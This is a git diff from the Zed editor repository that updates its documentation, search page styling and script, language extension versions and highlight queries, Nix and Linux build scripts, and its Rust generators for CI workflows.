"project_panel": {
"scrollbar": {
- "show": null
+ "show": null,
+ "horizontal_scroll": true
}
}
}
@@ -4959,29 +4971,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
**Options**
-1. Show scrollbar in the project panel
-
-```json [settings]
-{
- "project_panel": {
- "scrollbar": {
- "show": "always"
- }
- }
-}
-```
-
-2. Hide scrollbar in the project panel
-
-```json [settings]
-{
- "project_panel": {
- "scrollbar": {
- "show": "never"
- }
- }
-}
-```
+- `show`: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details.
+- `horizontal_scroll`: Whether to allow horizontal scrolling in the project panel. When `false`, the view is locked to the leftmost position and long file names are clipped.
### Sort Mode
@@ -5108,7 +5099,8 @@ See the [debugger page](../debugger.md) for more information about debugging sup
"collapse_untracked_diff": false,
"scrollbar": {
"show": null
- }
+ },
+ "starts_open": false
}
}
```
@@ -5123,6 +5115,7 @@ See the [debugger page](../debugger.md) for more information about debugging sup
- `sort_by_path`: Whether to sort entries in the panel by path or by status (the default)
- `collapse_untracked_diff`: Whether to collapse untracked files in the diff panel
- `scrollbar`: When to show the scrollbar in the git panel
+- `starts_open`: Whether the git panel should open on startup
## Git Worktree Directory
@@ -0,0 +1,71 @@
+---
+title: Roles - Zed
+description: Understand Zed's organization roles and what each role can access, manage, and configure.
+---
+
+# Roles
+
+Every member of a Zed organization is assigned a role that determines
+what they can access and configure.
+
+## Role Types {#roles}
+
+Every member of an organization is assigned one of three roles:
+
+| Role | Description |
+| ---------- | ------------------------------------------------------ |
+| **Owner** | Full control, including billing and ownership transfer |
+| **Admin** | Full control, except billing |
+| **Member** | Standard access, no privileged actions |
+
+### Owner {#role-owner}
+
+An owner has full control over the organization, including:
+
+- Invite and remove members
+- Assign and change member roles
+- Manage billing, payment methods, and invoices
+- Configure data-sharing policies
+- Disable Zed's collaborative features
+- Control whether members can use Zed-hosted models and Zed's edit predictions
+- Transfer ownership to another member
+
+### Admin {#role-admin}
+
+Admins have the same capabilities as the Owner, except they cannot:
+
+- Access or modify billing settings
+- Transfer organization ownership
+
+This role is suited for team leads or managers who handle day-to-day
+member access without needing visibility into payment details.
+
+### Member {#role-member}
+
+Members have standard access to Zed. They cannot access billing or
+organization settings.
+
+## Managing User Roles {#managing-users}
+
+Owners and Admins can manage organization members from the Zed
+dashboard within the Members page.
+
+### Inviting Members {#inviting-members}
+
+1. On the Members page, select **+ Invite Member**.
+2. Enter the member's company email address and choose a role.
+3. The invitee receives an email with instructions to join. After
+ accepting, they authenticate via GitHub.
+
+### Changing a Member's Role {#changing-roles}
+
+1. On the Members page, find the member. You can filter by role or
+ search by name.
+2. Open the three-dot menu and select a new role.
+
+### Removing a Member {#removing-members}
+
+1. On the Members page, find the member.
+2. Select **Remove** and confirm.
+
+Removing a member removes their access to organization settings and any organization-managed features. They can continue using Zed on their own.
@@ -50,7 +50,12 @@ Zed supports ways to spawn (and rerun) commands using its integrated [terminal](
// Whether to show the task line in the output of the spawned task, defaults to `true`.
"show_summary": true,
// Whether to show the command line in the output of the spawned task, defaults to `true`.
- "show_command": true
+ "show_command": true,
+ // Which edited buffers to save before running the task:
+ // * `all` — save all edited buffers
+ // * `current` — save current buffer only
+ // * `none` — don't save any buffers
+ "save": "all"
// Represents the tags for inline runnable indicators, or spawning multiple tasks at once.
// "tags": []
}
@@ -89,6 +94,7 @@ These variables allow you to pull information from the current editor and use it
- `ZED_STEM`: stem (filename without extension) of the currently opened file (e.g. `main`)
- `ZED_SYMBOL`: currently selected symbol; should match the last symbol shown in a symbol breadcrumb (e.g. `mod tests > fn test_task_contexts`)
- `ZED_SELECTED_TEXT`: currently selected text
+- `ZED_LANGUAGE`: language of the currently opened buffer (e.g. `Rust`, `Python`, `Shell Script`)
- `ZED_WORKTREE_ROOT`: absolute path to the root of the current worktree. (e.g. `/Users/my-user/path/to/project`)
- `ZED_CUSTOM_RUST_PACKAGE`: (Rust-specific) name of the parent package of $ZED_FILE source file.
@@ -44,6 +44,35 @@ You can set the mode to `"dark"` or `"light"` to ignore the current system mode.
}
```
+### Toggle Theme Mode from the Keyboard
+
+Use {#kb theme::ToggleMode} to switch the current theme mode between light and dark.
+
+If your settings currently use a static theme value, like:
+
+```json [settings]
+{
+ "theme": "Any Theme"
+}
+```
+
+the first toggle converts it to dynamic theme selection with default themes:
+
+```json [settings]
+{
+ "theme": {
+ "mode": "system",
+ "light": "One Light",
+ "dark": "One Dark"
+ }
+}
+```
+
+You are required to set both `light` and `dark` themes manually after the first toggle.
+
+After that, toggling updates only `theme.mode`.
+If `light` and `dark` are the same theme, the first toggle may not produce a visible UI change until you set different values for `light` and `dark`.
+
## Theme Overrides
To override specific attributes of a theme, use the `theme_overrides` setting.
@@ -368,7 +368,10 @@ mark.fade-out {
.searchbar-outer {
margin-inline-start: auto;
margin-inline-end: auto;
+ width: 100%;
max-width: var(--content-max-width);
+ box-sizing: border-box;
+ padding: 16px;
}
#searchbar {
@@ -394,21 +397,21 @@ mark.fade-out {
.searchresults-header {
font-weight: bold;
font-size: 1em;
- padding-block-start: 18px;
+ padding-block-start: 0;
padding-block-end: 0;
- padding-inline-start: 5px;
- padding-inline-end: 0;
color: var(--searchresults-header-fg);
}
ul#searchresults {
list-style: none;
padding-inline-start: 0;
+ margin-block-end: 0;
}
ul#searchresults li {
margin: 10px 0px;
padding: 2px;
border-radius: 2px;
+ scroll-margin-block-end: 10px;
}
ul#searchresults li.focus {
background-color: var(--searchresults-li-bg);
@@ -794,8 +797,7 @@ ul#searchresults span.teaser em {
max-height: 600px;
display: flex;
flex-direction: column;
- padding: 16px;
- overflow-y: auto;
+ overflow-y: hidden;
border-radius: 8px;
background: var(--popover-bg);
@@ -803,8 +805,11 @@ ul#searchresults span.teaser em {
box-shadow: var(--popover-shadow);
}
-.searchbar-outer {
- width: 100%;
+.searchresults-outer {
+ flex: 1;
+ min-height: 0;
+ overflow-y: auto;
+ padding: 0px 22px 22px 22px;
}
#searchbar {
@@ -424,6 +424,31 @@
<script src="{{ path_to_root }}elasticlunr.min.js"></script>
<script src="{{ path_to_root }}mark.min.js"></script>
<script src="{{ path_to_root }}searcher.js"></script>
+
+ <script>
+ (function () {
+ // Check for focused search result and bring into the view
+ const ensureVisible = () => {
+ const focused = document.querySelector("#searchresults li.focus");
+
+ if (focused) {
+ focused.scrollIntoView({
+ block: "nearest",
+ inline: "nearest"
+ });
+ }
+ };
+
+ // 1. Listen for arrow key events
+ // 2. Wait for DOM to update
+ // 3. Call envsureVisible
+ document.addEventListener("keydown", function (e) {
+ if (e.key === "ArrowDown" || e.key === "ArrowUp") {
+ requestAnimationFrame(ensureVisible);
+ }
+ });
+ })();
+ </script>
{{/if}}
<script src="{{ path_to_root }}clipboard.min.js"></script>
@@ -8,56 +8,10 @@ If you are looking for the Zed extension registry, see the [`zed-industries/exte
Currently, Zed includes support for a number of languages without requiring installing an extension. Those languages can be found under [`crates/languages/src`](https://github.com/zed-industries/zed/tree/main/crates/languages/src).
-Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains a number of officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries).
+Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains some of the officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries).
+
+You can find the other officially maintained extensions in the [zed-extensions organization](https://github.com/zed-extensions).
## Dev Extensions
See the docs for [Developing an Extension Locally](https://zed.dev/docs/extensions/developing-extensions#developing-an-extension-locally) for how to work with one of these extensions.
-
-## Updating
-
-> [!NOTE]
-> This update process is usually handled by Zed staff.
-> Community contributors should just submit a PR (step 1) and we'll take it from there.
-
-The process for updating an extension in this directory has three parts.
-
-1. Create a PR with your changes. (Merge it)
-2. Bump the extension version in:
-
- - extensions/{language_name}/extension.toml
- - extensions/{language_name}/Cargo.toml
- - Cargo.lock
-
- You can do this manually, or with a script:
-
- ```sh
- # Output the current version for a given language
- ./script/language-extension-version <langname>
-
- # Update the version in `extension.toml` and `Cargo.toml` and trigger a `cargo check`
- ./script/language-extension-version <langname> <new_version>
- ```
-
- Commit your changes to a branch, push a PR and merge it.
-
-3. Open a PR to [`zed-industries/extensions`](https://github.com/zed-industries/extensions) repo that updates the extension in question
-
-Edit [`extensions.toml`](https://github.com/zed-industries/extensions/blob/main/extensions.toml) in the extensions repo to reflect the new version you set above and update the submodule latest Zed commit.
-
-```sh
-# Go into your clone of the extensions repo
-cd ../extensions
-
-# Update
-git checkout main
-git pull
-just init-submodule extensions/zed
-
-# Update the Zed submodule
-cd extensions/zed
-git checkout main
-git pull
-cd -
-git add extensions.toml extensions/zed
-```
@@ -1,6 +1,6 @@
[package]
name = "zed_glsl"
-version = "0.2.0"
+version = "0.2.2"
edition.workspace = true
publish.workspace = true
license = "Apache-2.0"
@@ -1,7 +1,7 @@
id = "glsl"
name = "GLSL"
description = "GLSL support."
-version = "0.2.0"
+version = "0.2.2"
schema_version = 1
authors = ["Mikayla Maki <mikayla@zed.dev>"]
repository = "https://github.com/zed-industries/zed"
@@ -5,6 +5,8 @@ path_suffixes = [
"vert", "frag", "tesc", "tese", "geom",
# Compute shaders
"comp",
+ # Mesh pipeline shaders
+ "task", "mesh",
# Ray tracing pipeline shaders
"rgen", "rint", "rahit", "rchit", "rmiss", "rcall",
# Other
@@ -1,108 +1,68 @@
-"break" @keyword
-
-"case" @keyword
-
-"const" @keyword
-
-"continue" @keyword
-
-"default" @keyword
-
-"do" @keyword
-
-"else" @keyword
-
-"enum" @keyword
-
-"extern" @keyword
-
-"for" @keyword
-
-"if" @keyword
-
-"inline" @keyword
-
-"return" @keyword
-
-"sizeof" @keyword
-
-"static" @keyword
-
-"struct" @keyword
-
-"switch" @keyword
-
-"typedef" @keyword
-
-"union" @keyword
-
-"volatile" @keyword
-
-"while" @keyword
-
-"#define" @keyword
-
-"#elif" @keyword
-
-"#else" @keyword
-
-"#endif" @keyword
-
-"#if" @keyword
-
-"#ifdef" @keyword
-
-"#ifndef" @keyword
-
-"#include" @keyword
-
-(preproc_directive) @keyword
-
-"--" @operator
-
-"-" @operator
-
-"-=" @operator
-
-"->" @operator
-
-"=" @operator
-
-"!=" @operator
-
-"*" @operator
-
-"&" @operator
-
-"&&" @operator
-
-"+" @operator
-
-"++" @operator
-
-"+=" @operator
-
-"<" @operator
-
-"==" @operator
-
-">" @operator
-
-"||" @operator
-
-"." @delimiter
-
-";" @delimiter
-
-(string_literal) @string
+[
+ "break"
+ "case"
+ "const"
+ "continue"
+ "default"
+ "do"
+ "else"
+ "enum"
+ "extern"
+ "for"
+ "if"
+ "inline"
+ "return"
+ "sizeof"
+ "static"
+ "struct"
+ "switch"
+ "typedef"
+ "union"
+ "volatile"
+ "while"
+ "#define"
+ "#elif"
+ "#else"
+ "#endif"
+ "#if"
+ "#ifdef"
+ "#ifndef"
+ "#include"
+ (preproc_directive)
+] @keyword
-(system_lib_string) @string
+[
+ "--"
+ "-"
+ "-="
+ "->"
+ "="
+ "!="
+ "*"
+ "&"
+ "&&"
+ "+"
+ "++"
+ "+="
+ "<"
+ "=="
+ ">"
+ "||"
+ "."
+ ";"
+] @operator
-(null) @constant
+[
+ (string_literal)
+ (system_lib_string)
+] @string
-(number_literal) @number
+(null) @constant.builtin
-(char_literal) @number
+[
+ (number_literal)
+ (char_literal)
+] @number
(identifier) @variable
@@ -110,11 +70,11 @@
(statement_identifier) @label
-(type_identifier) @type
-
-(primitive_type) @type
-
-(sized_type_specifier) @type
+[
+ (type_identifier)
+ (primitive_type)
+ (sized_type_specifier)
+] @type
(call_expression
function: (identifier) @function)
@@ -1,6 +1,6 @@
[package]
name = "zed_html"
-version = "0.3.0"
+version = "0.3.1"
edition.workspace = true
publish.workspace = true
license = "Apache-2.0"
@@ -1,7 +1,7 @@
id = "html"
name = "HTML"
description = "HTML support."
-version = "0.3.0"
+version = "0.3.1"
schema_version = 1
authors = ["Isaac Clayton <slightknack@gmail.com>"]
repository = "https://github.com/zed-industries/zed"
@@ -2,11 +2,11 @@
"/>" @close)
(#set! rainbow.exclude))
-(("</" @open
+(("<" @open
">" @close)
(#set! rainbow.exclude))
-(("<" @open
+(("</" @open
">" @close)
(#set! rainbow.exclude))
@@ -95,11 +95,8 @@ impl zed::Extension for HtmlExtension {
server_id: &LanguageServerId,
worktree: &zed::Worktree,
) -> Result<Option<zed::serde_json::Value>> {
- let settings = LspSettings::for_worktree(server_id.as_ref(), worktree)
- .ok()
- .and_then(|lsp_settings| lsp_settings.settings)
- .unwrap_or_default();
- Ok(Some(settings))
+ LspSettings::for_worktree(server_id.as_ref(), worktree)
+ .map(|lsp_settings| lsp_settings.settings)
}
fn language_server_initialization_options(
@@ -77,7 +77,6 @@ let
builtins.elem firstComp topLevelIncludes;
craneLib = crane.overrideToolchain rustToolchain;
- gpu-lib = if withGLES then libglvnd else vulkan-loader;
commonArgs =
let
zedCargoLock = builtins.fromTOML (builtins.readFile ../crates/zed/Cargo.toml);
@@ -179,7 +178,8 @@ let
libva
libxkbcommon
wayland
- gpu-lib
+ libglvnd
+ vulkan-loader
xorg.libX11
xorg.libxcb
libdrm
@@ -224,7 +224,7 @@ let
};
ZED_UPDATE_EXPLANATION = "Zed has been installed using Nix. Auto-updates have thus been disabled.";
RELEASE_VERSION = version;
- ZED_COMMIT_SHA = commitSha;
+ ZED_COMMIT_SHA = lib.optionalString (commitSha != null) "${commitSha}";
LK_CUSTOM_WEBRTC = pkgs.callPackage ./livekit-libwebrtc/package.nix { };
PROTOC = "${protobuf}/bin/protoc";
@@ -236,7 +236,8 @@ let
# about them that's special is that they're manually dlopened at runtime
NIX_LDFLAGS = lib.optionalString stdenv'.hostPlatform.isLinux "-rpath ${
lib.makeLibraryPath [
- gpu-lib
+ libglvnd
+ vulkan-loader
wayland
libva
]
@@ -245,7 +246,7 @@ let
NIX_OUTPATH_USED_AS_RANDOM_SEED = "norebuilds";
};
- # prevent nix from removing the "unused" wayland/gpu-lib rpaths
+ # prevent nix from removing the "unused" wayland rpaths
dontPatchELF = stdenv'.hostPlatform.isLinux;
# TODO: try craneLib.cargoNextest separate output
@@ -74,7 +74,15 @@ fi
export CC=${CC:-$(which clang)}
# Build binary in release mode
-export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+# We need lld to link libwebrtc.a successfully on aarch64-linux.
+# NOTE: Since RUSTFLAGS env var overrides all .cargo/config.toml rustflags
+# (see https://github.com/rust-lang/cargo/issues/5376), the
+# [target.aarch64-unknown-linux-gnu] section in config.toml has no effect here.
+if [[ "$(uname -m)" == "aarch64" ]]; then
+ export RUSTFLAGS="${RUSTFLAGS:-} -C link-arg=-fuse-ld=lld -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+else
+ export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib"
+fi
cargo build --release --target "${target_triple}" --package zed --package cli
# Build remote_server in separate invocation to prevent feature unification from other crates
# from influencing dynamic libraries required by it.
@@ -111,10 +119,12 @@ else
fi
fi
-# Strip debug symbols and save them for upload to DigitalOcean
-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed"
-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli"
-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server"
+# Strip debug symbols and save them for upload to DigitalOcean.
+# We use llvm-objcopy because GNU objcopy on older distros (e.g. Ubuntu 20.04)
+# doesn't understand CREL sections produced by newer LLVM.
+llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed"
+llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli"
+llvm-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server"
# Ensure that remote_server does not depend on libssl nor libcrypto, as we got rid of these deps.
if ldd "${target_dir}/${remote_server_triple}/release/remote_server" | grep -q 'libcrypto\|libssl'; then
@@ -61,6 +61,25 @@ if (includesIssueUrl) {
);
}
+const MIGRATION_SCHEMA_FILES = [
+ "crates/collab/migrations/20251208000000_test_schema.sql",
+ "crates/collab/migrations.sqlite/20221109000000_test_schema.sql",
+];
+
+const modifiedSchemaFiles = danger.git.modified_files.filter((file) =>
+ MIGRATION_SCHEMA_FILES.some((schemaFilePath) => file.endsWith(schemaFilePath)),
+);
+
+if (modifiedSchemaFiles.length > 0) {
+ warn(
+ [
+ "This PR modifies database schema files.",
+ "",
+ "If you are making database changes, a migration needs to be added in the Cloud repository.",
+ ].join("\n"),
+ );
+}
+
const FIXTURE_CHANGE_ATTESTATION = "Changes to test fixtures are intentional and necessary.";
const FIXTURES_PATHS = ["crates/assistant_tools/src/edit_agent/evals/fixtures"];
@@ -1,29 +0,0 @@
-#!/usr/bin/env bash
-
-set -euox pipefail
-
-if [ "$#" -lt 1 ]; then
- echo "Usage: $0 <language> [version]"
- exit 1
-fi
-
-LANGUAGE=$1
-VERSION=${2:-}
-
-EXTENSION_DIR="extensions/$LANGUAGE"
-EXTENSION_TOML="$EXTENSION_DIR/extension.toml"
-CARGO_TOML="$EXTENSION_DIR/Cargo.toml"
-
-if [ ! -d "$EXTENSION_DIR" ]; then
- echo "Directory $EXTENSION_DIR does not exist."
- exit 1
-fi
-
-if [ -z "$VERSION" ]; then
- grep -m 1 'version =' "$EXTENSION_TOML" | awk -F\" '{print $2}'
- exit 0
-fi
-
-sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$EXTENSION_TOML"
-sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$CARGO_TOML"
-cargo update --workspace
@@ -39,6 +39,8 @@ if [[ -n $apt ]]; then
make
cmake
clang
+ lld
+ llvm
jq
git
curl
@@ -48,6 +50,8 @@ if [[ -n $apt ]]; then
musl-tools
musl-dev
build-essential
+ pipewire
+ xdg-desktop-portal
)
if (grep -qP 'PRETTY_NAME="(Debian|Raspbian).+13' /etc/os-release); then
# libstdc++-14-dev is in build-essential
@@ -108,6 +112,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then
libzstd-devel
vulkan-loader
sqlite-devel
+ pipewire
+ xdg-desktop-portal
jq
git
tar
@@ -183,6 +189,8 @@ if [[ -n $zyp ]]; then
tar
wayland-devel
xcb-util-devel
+ pipewire
+ xdg-desktop-portal
)
$maysudo "$zyp" install -y "${deps[@]}"
finalize
@@ -211,6 +219,8 @@ if [[ -n $pacman ]]; then
pkgconf
mold
sqlite
+ pipewire
+ xdg-desktop-portal
jq
git
)
@@ -242,6 +252,8 @@ if [[ -n $xbps ]]; then
vulkan-loader
mold
sqlite-devel
+ pipewire
+ xdg-desktop-portal
)
$maysudo "$xbps" -Syu "${deps[@]}"
finalize
@@ -267,6 +279,8 @@ if [[ -n $emerge ]]; then
x11-libs/libxkbcommon
sys-devel/mold
dev-db/sqlite
+ media-video/pipewire
+ sys-apps/xdg-desktop-portal
)
$maysudo "$emerge" -u "${deps[@]}"
finalize
@@ -13,6 +13,7 @@ mod cherry_pick;
mod compare_perf;
mod danger;
mod deploy_collab;
+mod extension_auto_bump;
mod extension_bump;
mod extension_tests;
mod extension_workflow_rollout;
@@ -29,38 +30,99 @@ mod runners;
mod steps;
mod vars;
+#[derive(Clone)]
+pub(crate) struct GitSha(String);
+
+impl AsRef<str> for GitSha {
+ fn as_ref(&self) -> &str {
+ &self.0
+ }
+}
+
+#[allow(
+ clippy::disallowed_methods,
+ reason = "This runs only in a CLI environment"
+)]
+fn parse_ref(value: &str) -> Result<GitSha, String> {
+ const GIT_SHA_LENGTH: usize = 40;
+ (value.len() == GIT_SHA_LENGTH)
+ .then_some(value)
+ .ok_or_else(|| {
+ format!(
+ "Git SHA has wrong length! \
+ Only SHAs with a full length of {GIT_SHA_LENGTH} are supported, found {len} characters.",
+ len = value.len()
+ )
+ })
+ .and_then(|value| {
+ let mut tmp = [0; 4];
+ value
+ .chars()
+ .all(|char| u16::from_str_radix(char.encode_utf8(&mut tmp), 16).is_ok()).then_some(value)
+ .ok_or_else(|| "Not a valid Git SHA".to_owned())
+ })
+ .and_then(|sha| {
+ std::process::Command::new("git")
+ .args([
+ "rev-parse",
+ "--quiet",
+ "--verify",
+ &format!("{sha}^{{commit}}")
+ ])
+ .output()
+ .map_err(|_| "Failed to spawn Git command to verify SHA".to_owned())
+ .and_then(|output|
+ output
+ .status.success()
+ .then_some(sha)
+ .ok_or_else(|| format!("SHA {sha} is not a valid Git SHA within this repository!")))
+ }).map(|sha| GitSha(sha.to_owned()))
+}
+
#[derive(Parser)]
-pub struct GenerateWorkflowArgs {}
+pub(crate) struct GenerateWorkflowArgs {
+ #[arg(value_parser = parse_ref)]
+ /// The Git SHA to use when invoking this
+ pub(crate) sha: Option<GitSha>,
+}
+
+enum WorkflowSource {
+ Contextless(fn() -> Workflow),
+ WithContext(fn(&GenerateWorkflowArgs) -> Workflow),
+}
struct WorkflowFile {
- source: fn() -> Workflow,
+ source: WorkflowSource,
r#type: WorkflowType,
}
impl WorkflowFile {
fn zed(f: fn() -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::Contextless(f),
r#type: WorkflowType::Zed,
}
}
- fn extension(f: fn() -> Workflow) -> WorkflowFile {
+ fn extension(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::WithContext(f),
r#type: WorkflowType::ExtensionCi,
}
}
- fn extension_shared(f: fn() -> Workflow) -> WorkflowFile {
+ fn extension_shared(f: fn(&GenerateWorkflowArgs) -> Workflow) -> WorkflowFile {
WorkflowFile {
- source: f,
+ source: WorkflowSource::WithContext(f),
r#type: WorkflowType::ExtensionsShared,
}
}
- fn generate_file(&self) -> Result<()> {
- let workflow = (self.source)();
+ fn generate_file(&self, workflow_args: &GenerateWorkflowArgs) -> Result<()> {
+ let workflow = match &self.source {
+ WorkflowSource::Contextless(f) => f(),
+ WorkflowSource::WithContext(f) => f(workflow_args),
+ };
let workflow_folder = self.r#type.folder_path();
fs::create_dir_all(&workflow_folder).with_context(|| {
@@ -124,7 +186,7 @@ impl WorkflowType {
}
}
-pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
+pub fn run_workflows(args: GenerateWorkflowArgs) -> Result<()> {
if !Path::new("crates/zed/").is_dir() {
anyhow::bail!("xtask workflows must be ran from the project root");
}
@@ -138,6 +200,7 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
WorkflowFile::zed(danger::danger),
WorkflowFile::zed(deploy_collab::deploy_collab),
WorkflowFile::zed(extension_bump::extension_bump),
+ WorkflowFile::zed(extension_auto_bump::extension_auto_bump),
WorkflowFile::zed(extension_tests::extension_tests),
WorkflowFile::zed(extension_workflow_rollout::extension_workflow_rollout),
WorkflowFile::zed(publish_extension_cli::publish_extension_cli),
@@ -154,7 +217,7 @@ pub fn run_workflows(_: GenerateWorkflowArgs) -> Result<()> {
];
for workflow_file in workflows {
- workflow_file.generate_file()?;
+ workflow_file.generate_file(&args)?;
}
workflow_checks::validate(Default::default())
@@ -3,7 +3,7 @@ use indoc::indoc;
use crate::tasks::workflows::runners::{self, Platform};
use crate::tasks::workflows::steps::{
- self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named,
+ self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, use_clang,
};
use crate::tasks::workflows::vars;
@@ -23,7 +23,7 @@ pub(crate) fn deploy_collab() -> Workflow {
}
fn style() -> NamedJob {
- named::job(
+ named::job(use_clang(
dependant_job(&[])
.name("Check formatting and Clippy lints")
.with_repository_owner_guard()
@@ -33,8 +33,8 @@ fn style() -> NamedJob {
.add_step(steps::cache_rust_dependencies_namespace())
.map(steps::install_linux_dependencies)
.add_step(steps::cargo_fmt())
- .add_step(steps::clippy(Platform::Linux)),
- )
+ .add_step(steps::clippy(Platform::Linux, None)),
+ ))
}
fn tests(deps: &[&NamedJob]) -> NamedJob {
@@ -42,7 +42,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob {
named::bash("cargo nextest run --package collab --no-fail-fast")
}
- named::job(
+ named::job(use_clang(
dependant_job(deps)
.name("Run tests")
.runs_on(runners::LINUX_XL)
@@ -65,7 +65,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob {
.add_step(steps::cargo_install_nextest())
.add_step(steps::clear_target_dir_if_large(Platform::Linux))
.add_step(run_collab_tests()),
- )
+ ))
}
fn publish(deps: &[&NamedJob]) -> NamedJob {
@@ -0,0 +1,115 @@
+use gh_workflow::{
+ Event, Expression, Input, Job, Level, Permissions, Push, Strategy, UsesJob, Workflow,
+};
+use indoc::indoc;
+use serde_json::json;
+
+use crate::tasks::workflows::{
+ extensions::WithAppSecrets,
+ run_tests::DETECT_CHANGED_EXTENSIONS_SCRIPT,
+ runners,
+ steps::{self, CommonJobConditions, NamedJob, named},
+ vars::{StepOutput, one_workflow_per_non_main_branch},
+};
+
+/// Generates a workflow that triggers on push to main, detects changed extensions
+/// in the `extensions/` directory, and invokes the `extension_bump` reusable workflow
+/// for each changed extension via a matrix strategy.
+pub(crate) fn extension_auto_bump() -> Workflow {
+ let detect = detect_changed_extensions();
+ let bump = bump_extension_versions(&detect);
+
+ named::workflow()
+ .add_event(
+ Event::default().push(
+ Push::default()
+ .add_branch("main")
+ .add_path("extensions/**")
+ .add_path("!extensions/slash-commands-example/**")
+ .add_path("!extensions/test-extension/**")
+ .add_path("!extensions/workflows/**")
+ .add_path("!extensions/*.md"),
+ ),
+ )
+ .concurrency(one_workflow_per_non_main_branch())
+ .add_job(detect.name, detect.job)
+ .add_job(bump.name, bump.job)
+}
+
+fn detect_changed_extensions() -> NamedJob {
+ let preamble = indoc! {r#"
+ COMPARE_REV="$(git rev-parse HEAD~1)"
+ CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ "#};
+
+ let filter_new_and_removed = indoc! {r#"
+ # Filter out newly added or entirely removed extensions
+ FILTERED="[]"
+ for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do
+ if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1 && \
+ [ -f "$ext/extension.toml" ]; then
+ FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]')
+ fi
+ done
+ echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT"
+ "#};
+
+ let script = format!(
+ "{preamble}{detect}{filter}",
+ preamble = preamble,
+ detect = DETECT_CHANGED_EXTENSIONS_SCRIPT,
+ filter = filter_new_and_removed,
+ );
+
+ let step = named::bash(script).id("detect");
+
+ let output = StepOutput::new(&step, "changed_extensions");
+
+ let job = Job::default()
+ .with_repository_owner_guard()
+ .runs_on(runners::LINUX_SMALL)
+ .timeout_minutes(5u32)
+ .add_step(steps::checkout_repo().with_custom_fetch_depth(2))
+ .add_step(step)
+ .outputs([("changed_extensions".to_owned(), output.to_string())]);
+
+ named::job(job)
+}
+
+fn bump_extension_versions(detect_job: &NamedJob) -> NamedJob<UsesJob> {
+ let job = Job::default()
+ .needs(vec![detect_job.name.clone()])
+ .cond(Expression::new(format!(
+ "needs.{}.outputs.changed_extensions != '[]'",
+ detect_job.name
+ )))
+ .permissions(
+ Permissions::default()
+ .contents(Level::Write)
+ .issues(Level::Write)
+ .pull_requests(Level::Write)
+ .actions(Level::Write),
+ )
+ .strategy(
+ Strategy::default()
+ .fail_fast(false)
+ // TODO: Remove the limit. We currently need this to workaround the concurrency group issue
+ // where different matrix jobs would be placed in the same concurrency group and thus cancelled.
+ .max_parallel(1u32)
+ .matrix(json!({
+ "extension": format!(
+ "${{{{ fromJson(needs.{}.outputs.changed_extensions) }}}}",
+ detect_job.name
+ )
+ })),
+ )
+ .uses_local(".github/workflows/extension_bump.yml")
+ .with(
+ Input::default()
+ .add("working-directory", "${{ matrix.extension }}")
+ .add("force-bump", false),
+ )
+ .with_app_secrets();
+
+ named::job(job)
+}
@@ -5,11 +5,12 @@ use crate::tasks::workflows::{
extension_tests::{self},
runners,
steps::{
- self, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder, NamedJob,
- checkout_repo, dependant_job, named,
+ self, BASH_SHELL, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder,
+ NamedJob, cache_rust_dependencies_namespace, checkout_repo, dependant_job, named,
},
vars::{
- JobOutput, StepOutput, WorkflowInput, WorkflowSecret, one_workflow_per_non_main_branch,
+ JobOutput, StepOutput, WorkflowInput, WorkflowSecret,
+ one_workflow_per_non_main_branch_and_token,
},
};
@@ -22,6 +23,7 @@ pub(crate) fn extension_bump() -> Workflow {
// TODO: Ideally, this would have a default of `false`, but this is currently not
// supported in gh-workflows
let force_bump = WorkflowInput::bool("force-bump", None);
+ let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned()));
let (app_id, app_secret) = extension_workflow_secrets();
let (check_version_changed, version_changed, current_version) = check_version_changed();
